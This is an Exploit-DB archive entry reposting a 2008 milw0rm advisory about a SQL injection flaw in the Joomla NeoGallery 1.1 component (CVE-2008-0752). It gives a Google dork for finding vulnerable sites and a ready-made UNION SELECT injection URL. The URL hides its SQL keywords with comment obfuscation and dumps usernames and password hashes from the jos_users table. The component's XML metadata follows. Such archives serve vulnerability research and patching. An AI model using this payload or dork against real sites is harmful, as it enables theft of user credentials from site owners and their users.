Joomla Component NeoGallery 1.1 - SQL Injection Vulnerability

2008-02-08T00:00:00
ID EDB-ID:5083
Type exploitdb
Reporter S@BUN
Modified 2008-02-08T00:00:00

Description

Joomla Component NeoGallery 1.1 SQL Injection Vulnerability. CVE-2008-0752. Webapps exploit for php platform

                                        
                                            #########################################################################
#
#  joomla SQL Injection(com_neogallery)
#
#########################################################################
#
#  AUTHOR : S@BUN
#
#  HOME : http://www.milw0rm.com/author/1334
#
#  MAÄ°L :    www.milw0rm.com@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl:"com_neogallery"
#
##########################################################################
EXPLOIT :

index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users

#########################################################################
# S@BUN                    i AM NOT HACKER                         S@BUN
#########################################################################
# S@BUN                  http://www.milw0rm.com                    S@BUN
#########################################################################
#                           THANKS STROKE
#########################################################################

	<name>NeoGallery</name>
	<creationDate>Septembre 2006</creationDate>
	<author>Nicolas Cornet - Neoweb</author>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<authorEmail>nicolas@neoweb.fr</authorEmail>

	<authorUrl>www.neoweb.fr</authorUrl>
	<version>1.1</version>
	<description><![CDATA[Ce composant vous permet d'afficher une galerie de photos, organisees en categories, sur votre site.<br />Realise par Nicolas Cornet - Neoweb.]]></description>

# milw0rm.com [2008-02-08]